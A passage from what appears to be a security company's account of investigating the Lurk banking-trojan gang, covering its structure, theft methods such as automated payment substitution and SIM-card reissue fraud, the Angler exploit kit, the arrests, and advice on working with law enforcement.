So, every morning, from Monday to Friday, people in different parts of Russia and Ukraine sat down in front of their computer and started to “work”. The programmers “tuned” the functions of malware modifications, after which the testers carried out the necessary tests on the quality of the new product. Then the team responsible for the botnet and for the operation of the malware modules and components uploaded the new version onto the command server, and the malicious software on botnet computers was automatically updated. They also studied information sent from infected computers to find out whether they had access to RBS, how much money was deposited in clients’ accounts, etc.
The money flow manager, responsible for transferring the stolen money into the accounts of money mules, would press the button on the botnet control panel and send hundreds of thousands of rubles to accounts that the “drop project” managers had prepared in advance. In many cases they didn’t even need to press the button: the malicious program substituted the details of the payment order generated by the accountant, and the money went directly to the accounts of the cybercriminals and on to the bank cards of the money mules, who cashed it via ATMs, handed it over to the money mule manager who, in turn, delivered it to the head of the organization. The head would then allocate the money according to the needs of the organization: paying a “salary” to the employees and a share to associates, funding the maintenance of the expensive network infrastructure, and of course, satisfying their own needs. This cycle was repeated several times.
Each member of the typical criminal group has their own responsibilities.
These were the golden years for Lurk. The shortcomings in RBS transaction protection meant that stealing money from a victim organization through an accountant’s infected machine did not require any special skills and could even be automated. But all “good things” must come to an end.
The end of “auto money flow” and the beginning of hard times
The explosive growth of thefts committed by Lurk and other cybercriminal groups forced banks, their IT security teams and banking software developers to respond.
First of all, the developers of RBS software blocked public access to their products. Before the appearance of financial cybercriminal gangs, any user could download a demo version of the program from the manufacturer’s website. Attackers used this to study the features of banking software in order to create ever more tailored malicious programs for it. Finally, after many months of “invisible war” with cybercriminals, the majority of RBS software vendors succeeded in perfecting the security of their products.
At the same time, the banks started to implement dedicated technologies to counter the so-called “auto money flow”, the procedure which allowed the attackers to use malware to modify the payment order and steal money automatically.
By the end of 2013, we had thoroughly explored the activity of Lurk and collected considerable information about the malware. At our farm of bots, we could finally launch a consistently functioning malicious script, which allowed us to learn about all the modifications cybercriminals had introduced into the latest versions of the program. Our team of analysts had also made progress: by the year’s end we had a clear insight into how the malware worked, what it comprised and what optional modules it had in its arsenal.
Most of this information came from the analysis of incidents caused by Lurk-based attacks. We were simultaneously providing technical consultancy to the law enforcement agencies investigating the activities of this gang.
It was clear that the cybercriminals were trying to counteract the changes introduced in banking and IT security. For example, once the banking software vendors stopped providing demo versions of their programs for public access, the members of the criminal group established a shell company to receive directly any updated versions of the RBS software.
Thefts declined as a result of improvements in the security of banking software, and the “auto money flow” became less effective. As far as we can judge from the data we have, in 2014 the criminal group behind Lurk seriously reduced its activity and “lived from hand to mouth”, attacking anyone they could, including ordinary users. Even if the attack could bring in no more than a few tens of thousands of rubles, they would still descend to it.
In our opinion, this was caused by economic factors: by that time, the criminal group had an extensive and extremely costly network infrastructure, so, in addition to employees’ salaries, it was necessary to pay for renting servers, VPN and other technical tools. Our estimates suggest that the network infrastructure alone cost the Lurk managers tens of thousands of dollars per month.
Attempts to come back
In addition to increasing the number of “minor” attacks, the cybercriminals were trying to solve their cash flow problem by “diversifying” the business and expanding their field of activity. This included developing, maintaining and renting the Angler exploit pack (also known as XXX). Initially, this was used mainly to deliver Lurk to victims’ computers. But as the number of successful attacks started to decline, the owners began to offer smaller groups paid access to the tools.
By the way, judging by what we saw on Russian underground forums for cybercriminals, the Lurk gang had an almost legendary status. Even though many small and medium-sized groups were willing to “work” with them, they always preferred to work by themselves. So when Lurk provided other cybercriminals with access to Angler, the exploit pack became especially popular – a “product” from the top underground authority did not need advertising. In addition, the exploit pack was actually very effective, delivering a very high percentage of successful vulnerability exploitations. It didn’t take long for it to become one of the key tools on the criminal2criminal market.
As for extending the field of activity, the Lurk gang decided to focus on the customers of major Russian banks and the banks themselves, whereas previously they had chosen smaller targets.
In the second half of 2014, we spotted familiar pseudonyms of Internet users on underground forums inviting specialists to cooperate on document fraud. Early the following year, several Russian cities were swamped with announcements about fraudsters who used fake letters of attorney to re-issue SIM cards without their owners being aware of it.
The purpose of this activity was to gain access to one-time passwords sent by the bank to the user so that they could confirm their financial transaction in the online or remote banking system. The attackers exploited the fact that, in remote areas, mobile operators did not always carefully check the authenticity of the documents submitted and released new SIM cards at the request of cybercriminals. Lurk would infect a computer, collect its owner’s personal data, generate a fake letter of attorney with the help of “partners” from forums and then request a new SIM card from the network operator.
Once the cybercriminals received a new SIM card, they immediately withdrew all the money from the victim’s account and disappeared.
Although initially this scheme yielded good returns, this didn’t last long, since by then many banks had already implemented protection mechanisms to track changes in the unique SIM card number. In addition, the SIM card-based campaign forced some members of the group and their partners out into the open and this helped law enforcement agencies to find and identify suspects.
Alongside the attempts to “diversify” the business and find new cracks in the defenses of financial businesses, Lurk continued to regularly perform “minor thefts” using the proven method of auto money flow. However, the cybercriminals were already planning to earn their main money elsewise.
New “specialists”
In February 2015, Kaspersky Lab’s Global Research and Analysis Team (GReAT) released its research into the Carbanak campaign targeting financial institutions. Carbanak’s key feature, which distinguished it from “classical” financial cybercriminals, was the participation of professionals in the Carbanak team, providing deep knowledge of the target bank’s IT infrastructure, its daily routine and the employees who had access to the software used to conduct financial transactions. Before any attack, Carbanak carefully studied the target, searched for weak points and then, at a certain moment in time, committed the theft in no more than a few hours. As it turned out, Carbanak was not the only group applying this method of attack. In 2015, the Lurk team hired similar experts.
How the Carbanak group operated.
We realized this when we found incidents that resembled Carbanak in style, but did not use any of its tools. This was Lurk. The Lurk malware was used as a reliable “back door” to the infrastructure of the attacked organization rather than as a tool to steal money. Although the functionality that had previously allowed for the near-automatic theft of millions no longer worked, in terms of its secrecy Lurk was still an extremely dangerous and professionally developed piece of malware.
However, despite its attempts to develop new types of attacks, Lurk’s days were numbered. Thefts continued until the spring of 2016. But, either because of an unshakable confidence in their own impunity or because of apathy, day-by-day the cybercriminals were paying less attention to the anonymity of their actions. They became especially careless when cashing money: according to our incident analysis, during the last stage of their activity, the cybercriminals used just a few shell companies to deposit the stolen money. But none of that mattered any more as both we and the police had collected enough material to arrest suspected group members, which happened early in June this year.
No one on the Internet knows you are a cybercriminal?
My personal experience of the Lurk investigation made me think that the members of this group were convinced they would never be caught. They had grounds to be that presumptuous: they were very thorough in concealing the traces of their illegal activity, and generally tried to plan the details of their actions with care. However, like all people, they made mistakes. These errors accumulated over the years and eventually made it possible to put a stop to their activity. In other words, although it is easier to hide evidence on the Internet, some traces cannot be hidden, and eventually a professional team of investigators will find a way to read and understand them.
Lurk is neither the first nor the last example to prove this. The infamous banking Trojan SpyEye was used to steal money between 2009 and 2011. Its alleged creator was arrested 2013, and convicted in 2014.
The first attacks involving the banking Trojan Carberp began in 2010; the members of the group suspected of creating and distributing this Trojan were arrested in 2012 and convicted in 2014. The list goes on.
The history of these and other cybercriminal groups spans the time when everyone (and members of the groups in particular) believed that they were invulnerable and the police could do nothing. The results have proved them wrong.
Unfortunately, Lurk is not the last group of cybercriminals attacking companies for financial gain. We know about some other groups targeting organizations in Russia and abroad. For these reasons, we recommend that all organizations do the following:
If your organization was attacked by hackers, immediately call the police and involve experts in digital forensics. The earlier you apply to the police, the more evidence the forensics will able to collect, and the more information the law enforcement officers will have to catch the criminals.
Apply strict IT security policies on terminals from which financial transactions are made and for employees working with them.
Teach all employees who have access to the corporate network the rules of safe online behavior.
Compliance with these rules will not completely eliminate the risk of financial attacks but will make it harder for fraudsters and significantly increase the probability of their making a mistake while trying to overcome these difficulties. And this will help law enforcement agencies and IT security experts in their work.
P.S.: why does it take so long?
Law enforcement agencies and IT security experts are often accused of inactivity, allowing hackers to remain at large and evade punishment despite the enormous damage caused to the victims.
The story of Lurk proves the opposite. In addition, it gives some idea of the amount of work that has to be done to obtain enough evidence to arrest and prosecute suspects. Unfortunately, the rules of the “game” are not the same for all participants: the Lurk group used a professional approach to organizing a cybercriminal enterprise, but, for obvious reasons, did not find it necessary to abide by the law. As we work with law enforcement, we must respect the law. This can be a long process, primarily because of the large number of “paper” procedures and restrictions that the law imposes on the types of information we as a commercial organization can work with.
Our cooperation with law enforcement in investigating the activity of this group can be described as a multi-stage data exchange. We provided the intermediate results of our work to the police officers; they studied them to understand if the results of our investigation matched the results of their research. Then we got back our data “enriched” with the information from the law enforcement agencies. Of course, it was not all the information they could find; but it was the part which, by law, we had the right to work with. This process was repeated many times until we finally we got a complete picture of Lurk activity. However, that was not the end of the case.
A large part of our work with law enforcement agencies was devoted to “translating” the information we could get from “technical” into “legal” language. This ensured that the results of our investigation could be described in such a way that they were clear to the judge. This is a complicated and laborious process, but it is the only way to bring to justice the perpetrators of cybercrimes.